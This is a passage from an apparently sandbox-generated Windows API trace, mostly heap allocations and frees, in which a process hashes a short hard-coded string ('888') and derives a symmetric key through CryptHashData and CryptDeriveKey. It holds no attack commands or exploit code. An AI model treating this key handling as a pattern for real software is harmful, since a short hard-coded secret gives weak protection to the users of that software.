(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0237.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0237.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0237.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f68 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0237.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0237.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0237.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0237.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0237.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51430 [0237.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51430, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0237.675] CryptHashData (hHash=0xa87250, pbData=0x2e54f58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0237.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0237.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0237.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0237.676] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0237.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0237.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.677] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0237.677] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0237.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0237.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0237.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0237.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0237.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0237.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0237.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0237.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0237.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51478 [0237.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51478, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0237.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.681] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0237.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0237.682] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87090) returned 1 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.682] RtlAllocateHeap 